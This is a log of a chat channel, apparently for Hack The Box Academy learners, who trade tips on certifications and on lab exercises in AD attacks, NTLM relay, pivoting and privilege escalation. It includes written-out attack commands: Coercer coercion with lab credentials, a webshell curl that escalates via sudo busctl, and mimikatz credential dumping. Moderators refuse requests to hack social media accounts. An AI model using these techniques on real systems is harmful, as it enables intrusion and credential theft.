#modules

1 messages · Page 279 of 1

solar zodiac
#

I havent gotten any htb certs, but I have the OSEP CRTO and OSCP

#

kinda broke right now, but I plan on getting certified through htb once I get some extra money

sterile solstice
#

OSCP is kinda what i was thinking..but for that cost, i want to be sure lol

solar zodiac
#

When I was applying for jobs, alot of the HR people asked me about it

#

I think HTB content is more thorough

#

but the OSCP is recognized as kind of a gate-keeping cert

sterile solstice
#

yea thats kinda why i thought at least getting the OSCP may help, though i'd value the CPTS more i think

#

well like you, kinda broke so reluctant to spend too much money needlessly lol

solar zodiac
#

I think both learning platforms have their benefits

#

honestly, I think HTB academy content is more thorough, but I do love being able to watch the videos of Offsec courses

sterile solstice
#

yea most certs ive done over the last few years have been mostly through vids

#

so this has been a change for me

#

last year i got my JNCIA and Security+. very heavy on the vids/multi choice exams lol

sterile solstice
#

oh yea? because theyre multi choice?

solar zodiac
#

I had the Pentest+ and literally 0 people hiring asked me about it lol

#

I did a linkedin search and it had 0 job listings

sterile solstice
#

theyre another gateway cert. i didnt mind them tbh

solar zodiac
#

they're not bad at all

#

I just had a bad experience with pentest+ lol

#

and employers asking me what that was haha

sterile solstice
#

hahaha. funny you mention it. my original plan was to do pentest+ endof this year as prep for more hands on. but then i saw a review on youtube for HTB and checked it out.

solar zodiac
#

yeah I mean comptia is reputable

#

but pentest+ is a new cert and doesn't have much clout

sterile solstice
#

hahaha well i see that one as more useful for some less-technical managers who need to know how it works but not being able to do a pentest

solar zodiac
#

I think the CPTS is gaining traction

sterile solstice
#

yea i think so. i mentioned it to a few others looking to get into the industry and they ahd heard about it recently too

#

i actually recommended to someone the other day to join up, do the skill paths like InfoSec fundamentals, Linux basics, then go to CyberDefenders and do there content and/or the CDSA

solar zodiac
#

nice

#

honestly I think comptia is well known.. I've heard of Sec+ being required for jobs with the DoD

#

I just had a bad experience with Pentest+ lol

sterile solstice
#

yea it is for a lot

#

i liked Sec+. i almost did Net+ but decided with JNCIA isntead

#

i highly recommend JNCIA. it can be a little vendor specific to juniper but there content in general is more on the vendor-neutral side.

solar zodiac
#

JNCIA sounds cool

#

I havent ever heard of it

sterile solstice
#

have you heard of CCNA?

#

its Juniper's equivalent to that

#

and juniper is all unix based which attracted me too lol

torn steppe
#

Could anyone help me with ntlm attack module?

solar zodiac
#

I have some friends with the CCNA

#

they do like networking specific tasks

#

we might want to carry on this chat in private msgs

#

I dont want to flood the modules channel

sterile solstice
#

yea, which is what its for. having some networking knowledge helps me in some of my jobs. i wanted to codify it in a cert and chose the JNCIA. glad i did tbh

torn steppe
#

need some help with: Use Coercer in 'coerce' mode against 172.16.117.60 and submit the name of the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass'.

shut vapor
#

In Shells & Payloads > Automating Payloads & Delivery with Metasploit. Is ||meterpreter|| not the command line interpreter used to establish a system shell session with the target as the first challenge question asks? Why is ||powershell|| the accepted answer there?

solar zodiac
#

hey can anyone sanity check me on the skills assessment for advanced sql injection? I've dumped the db but am creating the wrong Reset key for some reason

shell ore
#

small question about attacking common application skill assessment 2, i managed to get a reverse shell, but cant find the flag, tried to escalate to root, but the method is not working, any help? 😅

#

nvm it was a typo kek

#

ok nvm the nvm, i cant find the flag 🙂 💔

cedar yew
#

hello guys im stuck here

#

Next, we can set the wley user as our starting node, select the Node Info tab and scroll down to Outbound Control Rights.

#

im searching outbound control rights but i dont see

fathom pendant
#

select them, click them and see

#

either that your your collector didn't get everything properly

cedar yew
fathom pendant
#

outbound object control

muted jacinth
#

Hey guys can someone provide guidance for the last question of the Active Directory Trust Attacks - Skills Assessment? i rally have no idea where to go
i have an evil-winrm console on dc04.mssp.ad as Adminstrator but i can't really query the fabricorp.ad domain and i can't seem to fin any creds to move to fabricorp.ad
Ty

next bronze
muted jacinth
#

got one other has of the user h***y

#

hash*

next bronze
#

yep, look for edges from that

muted jacinth
#

ty

minor sonnet
#

Hello everyone , i have a question
module : Kerberos Attacks
section : skill assessment
the last question , i am not able to connect to the DC using RDP to use tools like rubues , is there any other method ?

cedar yew
#

AD enum attack module
ACL Section
ACL enum page
last question

What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

#

2 I can see about me but it doesn't accept it

fathom pendant
fathom pendant
torn steppe
#

could anyone help me with ntlm relay attack coercer tool part: Use Coercer in 'coerce' mode against 172.16.117.60 and submit the name of the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass

cedar yew
fathom pendant
#

Use the tools and techniques shown in the section

silk anchor
#

Anyone got any tips on how to get the machine on 'Internal Password Spraying - from Windows' to work?

xfreerdp is just returning a black screen, rdesktop saying invalid creds. I did manage to get it to connect once using xfree but I made it fullscreen and the session bugged out and dropped feelsneckingman
Tried with kali and pwnbox same issue on both.

cedar yew
#

okey thank you

fathom pendant
#

This is the 100th time someone's had that issue lmao

silk anchor
#

20 mins to find out you need to press enter on the black screen then 20 seconds to get the answer to the question.

torn steppe
#

marcielee could I dm you about one module question?

minor sonnet
silk otter
#

hey can anyone explain to me unmanaged powershell? I am having areal tough time detecting it and would love some help.
in the analyzing evil module

next bronze
quick eagle
#

Can someone give me some hint on this question " What is the API key the inlanefreight.htb developers will be changing too?" INFORMATION GATHERING - WEB EDITION module. I've been using ffuf for the past 2 days and cant find any subdomains. Added IP into /etc/hosts. Using Seclists wordlist. What am I doing wrong?

ffuf -w /home/htb-ac-927183/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.www.inlanefreight.com" -u http://94.237.59.63

autumn pilot
#

Where is the port

quick eagle
autumn pilot
#

the port is needed

quick eagle
#

ok knowing that the port is needed is a great help, saves me a tone of time. Am I using the right host? I've tried with the inlanefreight.htb but didnt find anything

minor sonnet
# next bronze just ask here

i got annett.xxx credentials , and i have connected to x.x.x.35 using rdp , and i got the ticket of the service and make renew and pass the ticket , but i am not able to read the \\DC01\Secret Share\flag.txt

next bronze
wary tendon
#

anyone having difficulties rdp to targets?

torn steppe
#

@next bronze I am trying to use coercer with responder but I only recieve "no_auth_recieved" in the output of coercer

minor sonnet
limber river
minor sonnet
wary tendon
#

ive tried everything what happend over the last few days

#

just stopped working

next bronze
limber river
limber river
#

maybe the xfreerdp cannot read the password correctly

wary tendon
limber river
#

try /tls-seclevel:0

wary tendon
#

wherwe would i put that?

#

v: /u: /p:

#

/tls-sec

limber river
wary tendon
#

? huh i wonder whwats going on with this

limber river
autumn pilot
#

use rdesktop or remmina

limber river
#

I prefer to use it over the other tools

autumn pilot
#

¯_(ツ)_/¯

torn steppe
#

@next bronze In the module I think they didn't mention any special responder configuration

next bronze
smoky gyro
#

Hi guys, any one knows what going on on The Live Engagement challange on SHELLS & PAYLOADS module ? the host-2 flag ? how can i upload a module on msfconsole

torn steppe
#

@next bronze in coercer command?

wary tendon
#

still having difficulties after git cloning the rdesktop doesnt find it

fathom pendant
#

I swear this assessment is.htb

quick eagle
fathom pendant
#

If it's the assessment; the domain is inlanefreight.htb

fathom pendant
#

Just use xxxx.rb

#

And it'll load

sleek urchin
fathom pendant
#

Iirc if you forget to add a vhost it doesn't work

smoky gyro
fathom pendant
wary tendon
fathom pendant
#

Pwnbox and parrot should have it installed by default

#

Otherwise it's likely in the repos with a sudo apt install

smoky gyro
wary tendon
#

whats the syntax structure to use it

fathom pendant
#

Exit then reopen msfconsole and do it again

fathom pendant
#

So just type remmina and it should just pop up the gui

coral forge
#

Heyy, while doing the module Network Enumeration with nmap in the section of nmap scripts, I see that the machine has a ||DOS vulnerability on the smb||, could I try to exploit that, or would that be too intrusive?

coral forge
#

Ok gotcha, ty very much

wary tendon
#

im in remmina tho

#

made a new profile

#

but no workie

fathom pendant
#

reach out to support then ¯_(ツ)_/¯

fathom pendant
#

Or maybe discovery

smoky gyro
coral forge
fathom pendant
fathom pendant
#

Note which interface can connect to the target server

sleek urchin
coral forge
fathom pendant
#

Note what ports are open

coral forge
pliant patio
#

need help. having some problem completing the windows attack and defense > credentials in share. for some reason i can't see the server01 and even the DC can't ping it

wary tendon
#

this chapter and module

#

i also dont have the help button on the bottom of the screen

next bronze
pliant patio
#

need help. having some problem completing the windows attack and defense > credentials in share. for some reason i can't see the server01 and even the DC can't ping it. resending with attach SS

torn steppe
#

@next bronze thx I will try to specified the rpc call

fathom pendant
wary tendon
next bronze
fathom pendant
#

No, in your mind

dim crag
#

i am stuck on pdf generator exploitation of injection attacks module. can someone who have done the section DM me to help please. Thnx

wary tendon
fathom pendant
#

Ask dumb questions, get dumb answers

torn steppe
#

@next bronze you meab during the scan method or coerce method?

next bronze
#

bud just run it and look at the RCP call names, use those as the answer

#

it's right there in the output

torn steppe
#

I have problems with the coerce part not the scan..not getting anyone coerced...

next bronze
#

screenshot the output

torn steppe
next bronze
#

I see the answer right there

#

you also didn't show the command you used

torn steppe
#

Not to spoil nothing...

#

To the rest of the community

next bronze
#

there's nothing to spoil, the command to run it is already given in the module

#

either way the answer is in the screenshot

torn steppe
#

I am sure you are referring to the first question of the section... Not the second...And I have troubles with the second

next bronze
#

I am referring to the second question

torn steppe
#

I am no getting any result with Error bad netpath

next bronze
#

buddy, if you refuse to provide the command you used, or try the RPC call names in the screenshot, I can't help you

pseudo kiln
#

Recently completed the pivoting modules and there was not much content on double pivoting, basically only the RDP example. Now I am trying to do it with metasploit, trying to chain multiple reverse port forwards togheter back to attack box, but every time I add a new reverse port forward rule, the previous one gets deleted. Anyone else faced this ?

fathom pendant
#

No, bc I use ligolo-ng

pseudo kiln
#

honestly I am thinking about giving up and learning about that one too, been trying for 2 hours to make this work with various workarounds

#

does it make it easy to set up double/triple pivots ?

fathom pendant
#

Yes

#

You set your listener up to forward to your host

#

Repeat ad nauseum

#

You'll need to link up multiple ligoloX interfaces if you don't want to have to stop/start sessions

wraith pelican
pseudo kiln
#

it does not seem to help me past second pivot

#

this is the topology, the idea is to get a meterpreter session with PIVOTWIN10, the last host on the right, so far I only managed to get meterpreter sessions with Ubuntu and server01 hosts

next bronze
#

I wouldn't pivot with metasploit tbh, has been pretty unreliable from my experience

wraith pelican
#

some of my notes, i'll not spawn the target at the moment but it seems to me I had access to the 172.16.6.0 network

next bronze
#

ssh/chisel would be ideal, even better is ligolo as mentioned

wraith pelican
#

sure, it is just i tried the stuff when doing the module.
and for Xoriath, i checked and i got a evil-winrm session on the last host, i do not see a meterpreter session

pseudo kiln
#

yeah, it's possible to get an rdp on it too, my idea was to sort of use metasploit as a c2, but I guess that's not really a thing for this

pseudo kiln
next bronze
#

chisel you can dynamic the first tunnel and standard port forwarding the second

#

but yes ligolo would make this a lot easier

wraith pelican
pseudo kiln
fathom pendant
#

From host A you'd forward to attack box, then connect to B from A

#

And use the forwarded port

#

Ligolo is a lite c2 which allows remote management of the listeners (but not full command/control)

solar zodiac
#

can anyone sanity check me for the advanced sql injection skills assessment? I dumped the db but for some reason the next step isnt working for me

stark lark
#

Hey man did you work this out? Been having the same error. Tried restarting lab and increasing timeout but the SMB connection seems super slow.

fathom pendant
#

Try changing vpn regions, respawning target

stark lark
#

Will try, btw do you think it will make a difference if I try to mount it?

fathom pendant
#

I don't think you can mount it

#

Considering it might be filesystem differences and such

rustic sage
#

Sorry I know I shouldn't talk about that here, but I got no choice. It's the only channel I can talk in so I think there is a problem

torn steppe
#

@next bronze Coercer coerce -t 172.16.117.60 -l 172.16.117.30 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v --always-continue and for responder sudo python3 Responder.py -I ens192

#

no one of the output has this result: '[+] (ERROR_BAD_NETPATH)'

#

all the rpc calls have this result: (NO_AUTH_RECEIVED)

next bronze
torn steppe
#

yes with crackmapexec

#

to smb service

next bronze
#

so it's not a valid account

torn steppe
#

what you mean?

#

So You need to provide a valid username and password to authenticate to the host ?

next bronze
#

did you try to add an account from the previous section instead of just copying the command given in the section

torn steppe
#

so it is necessary to make a post relay attack throught ldap, create the host account and use it for this?

exotic lion
#

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

Regarding this question above, I have dumped the process using volatility, used YARA to scan for malwares, used the cmdline plugin where I got an encoded command. I tried decoding it but couldn't.
I manually scrutinized the memory dump, tried several other things but still no head way.
All I am asking for is a hint, that'll help me move in the right direction.

next bronze
#

you have an actual account created previously don't you? why just blindly copy and paste the commands in the module?

torn steppe
#

because for different reason I cannot do in a single row all the sections so the answer is NOT, I try always to understand what I am doing but if there is nothing explained about what are the criterias for the credentials needed...sorry not to ask myself to do in anotehr way...

next bronze
#

if the creds are not explicitly provided for you to use, or ones that you have created, you can assume they don't work

#

especially the accounts used in the sections, they're usually removed or disabled so that you have to follow what they did in the module instead of copy and pasting

torn steppe
#

yeah the question is to know if the error comes from the credentials or responder.conf file or whatever...is the first time I saw this tool so....

#

I am sure you have also copied and pasted in some moment mate!

modest remnant
#

"We can view the first archived version of HackTheBox by entering the page we are looking for into the Wayback Machine and selecting the earliest available capture date, being 2017-06-10 @ 04h23:01" -- am I the only one that can't see a snapshot for this date?

next bronze
#

I actually don't

#

I have never used that plaintext$ account in the module because I assume it doesn't work

torn steppe
#

I don't mean in this module 🙄

#

I mean in your learning path

next bronze
#

again I don't blindly copy commands without understanding what they do

torn steppe
#

Understanding what coercer is doing it is not relevant for asuming that the credentials provided in the example are not going to work! Maybe you asumed it, well done! But it doesn't mean that others are copying and pasting without thinking.

warm portal
#

some call it blindly copying, I call it "dynamic analysis"

torn steppe
#

try to asume ! you are really good on it

next bronze
#

buddy is mad at me for not being able to copy and paste commands in modules

torn steppe
#

@next bronze no way dude, you helped me!! 🙂

modest remnant
cloud urchin
#

wow finally, no dumb banner on the top of the htb pages.

wintry iris
#

Hello guys

#

Good morning!/Good Evening!

#

I am doing the Oracle TNS module, it's so time consuming!

fathom pendant
#

It can take a bit of time

#

But make sure you didn't miss the user/pass

#

Once you get that you can stop it

past kite
#

Hey guys
I’m going through the Attacking Enterprise Network, I complete External Testing, but I don’t understand why we choose ||monitoring|| subdomain for testing more deeply, could you explain please?

fathom pendant
#

Also: most people do this blind, so revealing the subdomain is spoiling

wintry iris
fathom pendant
#

Short answer: you check all found subdomains

past kite
#

Yes, I found all vuln on this subdomains. Only ||monitoring|| subdomain in our scope?

fathom pendant
#

Also redact the subdomain, since spoiling

#

The other thing is a subdomain can reveal the type of content that may be found

past kite
#

In this module, are we just not following the steps for deeper testing with other subdomains?

high reef
#

i need help with this question can anyone heelp me

acoustic owl
stark lark
analog dock
high reef
acoustic owl
#

The module shows you other things. Brute force does not always work

high reef
#

dnsenum didn't work, final recon didn't work

#

Reconspider didnt work

acoustic owl
#

Take a look at the module. There are other things you can try

high reef
#

amass nothing

lunar kestrel
#

Hello

#

Anyone?

honest tinsel
#

Anyone know how to use medusa to hack social media?

wraith pelican
# high reef Reconspider didnt work

are you sure your command has a correct syntax? did you try multiple options? Do you get errors? Do you understand what you are spidering?

lunar kestrel
#

@honest tinsel hello

honest tinsel
#

Hi

fathom pendant
#

Take any point you can to move forward

#

<@&861185840277487616> , I suggest you don't ask

honest tinsel
#

I know I need to bypass strong security measures

lunar kestrel
#

Okhhay@fathom pendant

honest tinsel
#

Rate limting etc

fathom pendant
ember fern
#

that is not what HTB is for

fathom pendant
ember fern
#

if you're interested in that, I suggest you look elsewhere

honest tinsel
fathom pendant
ember fern
#

we don't teach or condone illegal activity

honest tinsel
#

Trying to elavte to be an ethical hacker

silk anchor
#

You dont own your social media acc 😂

fathom pendant
#

^

#

Also depending on the service they may have carveouts for you testing on your own account(s) but you do gotta read their bounty/vdp

lunar kestrel
fathom pendant
#

This channel isn't for casual talk

ember fern
#

#modules is for conversations related to Academy modules. There are more off-topic channels around, but in none of them do we accept users discussing illegal activity

#

(in a non-ironic manner)

#

sorry to be a killjoy

#

🙃

lunar kestrel
#

I can't access general channel

ember fern
high reef
acoustic owl
wintry iris
#

does the IPMI module's target machine takes a long time to be spawned?

stark lark
stark lark
next bronze
#

you can transfer the file over to a windows vm

stark lark
next bronze
#

yes if you'd like to mount it in windows

stark lark
next bronze
#

from where to where

stark lark
#

From kali VM to windows VM

next bronze
#

pretty sure inter vm copy and paste isn't possible for both vbox and vmware

#

you can use other methods to transfer files

stark lark
stark lark
next bronze
#

mount a shared folder, http server, smb server, etc

#

I mean you can also copy the files to your host then to the windows vm

stark lark
solar zodiac
#

can anyone sanity check me?I'm trying to generate a secret key in the Advanced SQL Injection Skills Assessment and am not sure why it is saying my secret key is invalid

solar zodiac
#

hmm.. i think I found my issue... fernflower and jdgui were decompiling the application differently

#

leading to completely different ways of generating secret keys

#

debugging it locally helped me see what was wrong

#

I wrote a script to dump the DB but one of the columns wont dump. if anyone could nudge i'd be forever in your debt 🙂

rustic sage
#

If it is specified to me that I should refrain from attacking the service or using exploits, does that mean I should stay away from nmap scripts too? -sV sC for example

solar zodiac
#

some nmap scripts do more than others

rustic sage
solar zodiac
#

version should be fine

#

all it does is look at the output from the connection

#

and compare it to known values

rustic sage
solar zodiac
#

ofcourse

#

im talking about in htb labs

#

you might want to get permission first on a real target 🙂

cloud urchin
#

NTLM Relay Attacks --> NTLMRelayx Use Cases. Question says "Use impacket's SOCKS server to hold RMONTY's relayed connections and abuse them to find an accessible shared folder on one of the relay targets; once connected to it, submit the contents of the file 'connections.txt'." RMONTY doesn't seem to have permission to access the share, but PETER does. Am I doing something wrong?

fathom pendant
next bronze
cloud urchin
#

yeah i know

next bronze
#

there should be a share where the other guy can access

cloud urchin
#

i was able to get it using the interactive smb client

#

it's the same share, peter can just access it with smbexec, rmonty cannot

#

so i see now, i just didn't go far enough in the section

#

rmonty can access it via the interactive but not exec

next bronze
#

yes

#

smbexec and smbclient

cloud urchin
#

ya

#

thanks

#

sad for us that ms is going to kill ntlm

#

i have a feeling environments will still have it 10+ years from now lol

next bronze
#

yeah for sure

#

it will be a while before orgs actually stop using it

dawn cove
#

Hi, I am attempting to get reverse shell from MSSQL utilzing xp_cmdshell, but when getting a file via HTTP server the request is never reached to the server; however, when running nc on kali, the request received !

#

I am using Ligolo, the MSSQL is in HOST02 and the flow is as this: HOST02 -> HOST01 -> Kali

fathom pendant
dawn cove
#

Yes

fathom pendant
#

So you have a listener that would forward the http request to your kali machine?

#

And you're specifying the proper port

dawn cove
#

Yes

solar zodiac
#

woo hoo figured it out 😄

solar zodiac
sterile solstice
#

hows the module going?

solar zodiac
#

its great! im learning a ton

#

was kinda stuck for a while because jdgui decompiled the code incorrectly

#

but after decompiling it with fernflower im making good progress 🙂

sterile solstice
#

noice!

solar zodiac
#

also debugging java webapps with vscoded is neat

#

I don't do much whitebox stuff

sterile solstice
#

do you have java coding experience already?

solar zodiac
#

so this is a neat experience

#

only doing code review for vulnerable functions/obvious vulnerabilities

sterile solstice
#

i actually have the Whitebox pentest module on favourites as well lol.

solar zodiac
#

yeah that module was great too! 🙂

sterile solstice
#

ah ok. i was just curious how much coding exp you need to do that kind of debug/review.

solar zodiac
#

honestly I dont think you need much

sterile solstice
#

i was leaning that way but wasnt entirely sure.

solar zodiac
#

chat gpt will explain the code line by line

#

if you ask it to lol

sterile solstice
#

oh, i havent thought of using chatgpt for that. interesting

rustic sage
#

hello guys, how are you? I am having problems with the Perfection machine... it does not respond to the execution of commands, can someone guide me a little?

solar zodiac
#

thats how I've been learning to code well 🙂

#

err not well, but better

#

I read the code, and then when I get stumped I asked chat gpt what does this mean?

#

and then after just going through a bunch of code it becomes 2nd nature

sterile solstice
#

i know of some ppl who used chatgpt to help with a scaffhold script for some python stuff. they said it wasn't 100%, but was a good base to then modify.

#

great to know! fountain of knowledge mate lol

solar zodiac
#

yeah chat gpt is a definetely a tool. I'd check over its accuracy like I would a child

#

but its great for gaining some insight

#

I think the whitebox module talks about using it

#

to review the code

fathom pendant
dim wolf
#

perfection is a retired machine

sterile solstice
#

tbh, i'm not a fan of ppl relying too heavily on genAI tools. i dont think its substitutes for foundational knowledge. but as an aid i'm all for it.

fathom pendant
#

Still applies to read and follow #welcome to access it

solar zodiac
fathom pendant
#

It all depends on how you use it

sterile solstice
#

agreed!

#

too often i've had ppl just say 'can't we just get some AI/ML to do that' without understanding that good quality data is everything...models drift. and it doesn't substitute for having tranined personnel.

#

but i may use it for some hints/push like LonelyOrphan has used it. will definitely be helpful there

#

yea and I heard it gets worse if you have 1 model interacting with another. i've also had to shutdown that before.

#

on another note, this AD attack module has been super interesting!

#

interesting

#

would explain why our AI expert has a masters in applied mathematics. haha

#

which is definitely not my strong suit 😆

solar zodiac
sterile solstice
#

ah, that makes sense though. as i've been going through, it just seems like its so susceptible to abuse

#

though HTB is obviously showing easier targets to reinforce training/learning.

#

yea definitely. all of the corp environments ive been in obviously use AD. im taking my time with this module. want to make sure i understand it.

fathom pendant
#

(on the light end)

quick eagle
#

Can someone give hint on this question please? "What is the API key the inlanefreight.htb developers will be changing too?" It's a skills assessment on Information Gathering - Web Edition, last question. I found 2 additional subdomains and added them into /ec/hosts. Ran ./finalrecon.py --full --url http://inlanefreight.htb and cant find any API.

sterile solstice
#

well out of my league haha

fathom pendant
#

look for subdomains (and perhaps another)

quick eagle
next whale
#

Does anybody know anyone that could help me get the email and password for a Instagram account or outlook for Free

fathom pendant
quick eagle
fathom pendant
#

it also helps to have the subdomains in your /etc/hosts file

quick eagle
fathom pendant
#

also to answer your question from earlier: the port does not go in /etc/hosts

#

you need to specify it in your command http://url:port

#

http defaults to 80, which this server isn't running it on

fathom pendant
#

also i did not invite you to DM me

cloud urchin
#

Intermediate Network Traffic Analysis, Peculiar DNS traffic. This module states the first step after a DNS query initiation is a local cache check. That is incorrect for a Windows machine, it should be that the Windows machine first checks to see if the hostname is its own, and then it checks the hosts file, and then the local cache. Am I wrong?

#

the microsoft documentation conflicts with what the module says

#

i believe for linux the order is determined by nsswitch.conf, but generally it checks the hosts file first then the local cache would would make it incorrect for linux as well

quick eagle
fathom pendant
#

just ask first and I believe I told you no earlier

quick eagle
cloud urchin
#

it's in the server rules

quick eagle
#

Must have missed that rule…

#

Like I am missing API for this assessment lol

cloud urchin
#

too late now, the police are on their way

fathom pendant
#

it's likely why finalspider wasn't working, you didn't specify the port for it to connect to, since 80 isn't the one hosting the service

quick eagle
sterile solstice
#

anyone having issues with targets spawning?

solar zodiac
#

hey guys! I'm having a bit of trouble with the last flag for the advanced sqli injection skills assessment. I've tried both ways of RCE mentioned in the module, along with a modified automated script. If anyone could sanity check me i'd be very grateful 🙂

wintry compass
#

Thank you!! I just spent 1.5 hours to fix this problem……

cloud urchin
#

no

granite osprey
thorn hawk
#

Hi amigos. Hope you all having an excellent weekend. I have a question regarding enrolled paths. I am currently enrolled in the Bug Bounty Hunter path and have finalized 70% of the modules. But I have see then new path Senior Web Penetration tester and i feel this one will teach better skills that the Bug Bounty Hunter path. Do you think it is wise to just jump to a new path and continue from there? This will also help me as the Senior Web Pen path is much more expensive thus i could use the cubes I have to do this one. Any input is welcome. thank you all

tranquil axle
# thorn hawk Hi amigos. Hope you all having an excellent weekend. I have a question regarding...

I feel like if you’ve already done 70% you might as well finish the path. The remaining cubes you need for the last 30% are probably less than the cost of a single module of the cwee path.

Now if you already know everything you’d be learning in the last 30% you could save the cubes and start going for the advanced cwee modules, but as you already noticed they are much more expensive and if you are a platinum sub you can only do 2 per month

crisp nacelle
#

did anyone complete attacking common services module

#

none of the lab is working for me

#

cant find any open ports

#

even with -Pn and -p-

thorn hawk
#

the maths dont really add up or I am missing some info?

sterile solstice
sterile solstice
crisp nacelle
#

none of them working

storm elk
sterile solstice
#

ah ok. unsure. i couldnt spawn a target for hours.

crisp nacelle
#

target is spawning

#

but no services responding

sterile solstice
#

when thats happened to me, ive had to reset the target

#

i know one of them was broken as i went online to find some walkthroughs and the particular port was closed for me, but was most definitely meant to be open

crisp nacelle
#

i have respawned the target many times

#

but same problem

sterile solstice
#

well it could be buggy like the 1 i had

#

otherwise im unsure. you may have to look for some help. i used youtube a few times to give me a nudge or google couldnt help

tranquil axle
crisp nacelle
wraith pelican
crisp nacelle
#

but it only works on attackbox

#

not vpn

wraith pelican
# crisp nacelle not vpn

did you try to redownload a vpn configuration file, maybe checking for another region with less load, switching to tcp?

crisp nacelle
#

I will try

#

also many basic tools like crackmapexec isnt on attackbox

#

and when installing them with apt it shows error

wraith pelican
crisp nacelle
#

ok

wraith pelican
sterile solstice
#

installing it now.

#

will have a look later

hardy elk
#

hello, i m doing the CBBH, more precisely, i'm doing the Information Gathering room and i'm at the Web Archives, but i can't answer to the first two questions, if someone can help me please

sterile solstice
#

cant help you. just had a look and the questions are different

hardy elk
#

"How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234. "
"How many members did HackTheBox have on the 10th June 2017? Answer with an integer, eg 1234. "

You don't have this questions ?

sterile solstice
#

i do. but i did that section before the update, and my answers dont watch the question

hardy elk
#

okay so how can i answer ?

sterile solstice
#

not sure sorry. im not able to go back over the section and re-do it, right now.

acoustic owl
hardy elk
#

yeah it s what i did i was able to answer to the following questions, but not the first two

acoustic owl
#

Have a look at the website of the date mentioned and search for the information there.

hardy elk
#

yeah it s what i did too but it isn't working for hackthebox.com website

#

but for facebook.com, paypal.com... it worked

wraith pelican
#

you may want to check closer the screenshot in the section

hardy elk
#

can you try it yourself because i can t

#

i got a redirection every time i try

hardy elk
wraith pelican
#

yeah maybe just delete this post, so the fun isnt spoiled for other searchers : )

hardy elk
#

okay sorry but thank you very much !

stone hare
#

Hi, currently doing the metasploit module and I'm on the payloads section. Basically, I got an Apache Druid service running, and I selected the exploit with the correct payload, but no matter what port I choose, or even what payload I choose, I always get an "Exploit completed, but no session was created." error. I had this before, and usually all I had to do was just switch payloads, but I went through every single one and get the same error. Whats the reason for this?

#

My LHOST is set to tun0

#

Alright solved, just NEVER use meterpreter payloads apparently, just use regular shells

fathom pendant
#

did you set teh LHOST to your tun0?

#

that looks like it's your normal VBox IP

#

not the IP assigned by htb (which is a 10.10.0.0/16 address

#

(there's routing that restricts access and such

wraith pelican
fathom pendant
#

also the exploit completed which means it worked, however no session was created because the remote host couldn't call back to their box

stone hare
stone hare
minor sonnet
#

Hello, has anyone finished the crackmapexec skill assessment first question? I have followed the hint, but still, I am not able to enumerate the users. I have also seen the HTB forums, and I am not able to make --rid-brute

fathom pendant
#

your LHOST IP in the screenshot doesn't look like the tun0 IP is why I asked lol; 10.0.2.15 isn't an HTB tun IP afaik

acoustic owl
hexed lintel
#

not getting reverse shell
what might be the reason

#

Windows Priv Esc Module ; DNSAdmins section

autumn pilot
#

Do the most basic thing

#

How could you make the user's priv to update

wraith pelican
#

I had to use sc.exe and not just sc to restart the dns

rich garden
#

Needed some help in Blurry machine, is evaluate_models.py supposed to be writable? Its giving operation not permitted

fathom pendant
fathom pendant
granite osprey
#

Module Linux Privilege Escalation - flag 5 -
I have managed to launch a webshell (https://github.com/simran-sankhala/Pentest-Tomcat/blob/main/README.md) to get flag4. Thanks to https://gtfobins.github.io/gtfobins/busctl/ and the fact that busctl has sudo rights, I should be able to escalate my privileges from Tomcat to Root. The thing is that the webshell does not respond to the command given (curl -u xxx : xxx http://localhost:8080/webshell/ -X POST -d 'cmd=sudo /usr/bin/busctl --show-machine \n !/bin/sh' ). Can anybody help ?

zealous rune
#

hi. If i take a memory dump of the lsass process (via the task manager for example) I can then use mimikatz to dump the hashes from the memory dump?

#

or i can use mimikatz to dump the hashes directly from the lsass process in memory. Correct?

fathom pendant
#

mimikatz just dumps it depending on what submodule you use

zealous rune
#

ok. but it can dump from a saved file?

fathom pendant
#

the idea of dumping the process and analyzing it on your system is to basically take the process off the machine

zealous rune
#

just need to call the right module

fathom pendant
zealous rune
near hatch
#

Hi Everyone - can anyone assist with this really basic query?

Windows Fundamentals - Introduction to Windows

I've RDP'd in using xfreerdp

However I am unable to get any details using the "Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber" command as stated on the page.

I keep getting an error message "Get-WmiObject" is not recognized as an internal or external command, operable program or batch file.

I've tried this using xfreerdp on PwnBox and also using Remmina via OpenVPN but cannot seem to get it to work.

Any assistance would be greatly appreciated.

Have a great day

fathom pendant
zealous rune
#

are u using a powershell?

fathom pendant
#

Get-WMIObject is a powershell command

zealous rune
#

cheers thx a lot

#

that's a gr8 site

wraith pelican
fathom pendant
zealous rune
#

@wraith pelican indeed I understand that thx. I wanted to know if mimkatz on windows could be used to dump hashes from a previously dumped file

fathom pendant
#

which isn't covered

zealous rune
#

perfect seems u can

#

I don't need it to complete the exercises i was just curious

wraith pelican
#

my bad, i'm sorry

fathom pendant
#

in future @zealous rune just utilize google

wraith pelican
wraith pelican
# granite osprey yes, flag5

ok i didn't do it this way. I got one way via ssh only, and one way via a webshell from wordpress but then it falls back to a user and ssh. Curious to see if this will work, keep me posted. And another thing, maybe check if another busctl gtfobin will work.

granite osprey
#

Can you tell a bit more about your way ?

fathom pendant
#

probably best for dms since can be spoiler

wraith pelican
#

just escalating from a user to another using the first ssh session as htb-student

granite osprey
#

Do you mean that you have found Tomcat's password ?

wraith pelican
#

yes i got it

granite osprey
#

So you have flag4 + a password to switch user from barry to tomcat

trail shuttle
#

Guys i'm having an issue with running Reconspider.py from the information gathering - creepy crawlies module, has this issue occured to any of y'all? i've followed the steps in the module carefully but this error keeps appearing

wraith pelican
#

but yeah we might as well continue in DM and remove all those messages

granite osprey
#

what does DM mean ? But yes, how do I contact you ?

wraith pelican
#

i sent you a direct message

trail shuttle
#

i've also tried it on the htb pwnbox but i couldn't do it either

fathom pendant
#

add --break-system-packages as stated by the note

#

find / -name "EXTERNALLY-MANAGED" it's one of those files added by python install

trail shuttle
winged drift
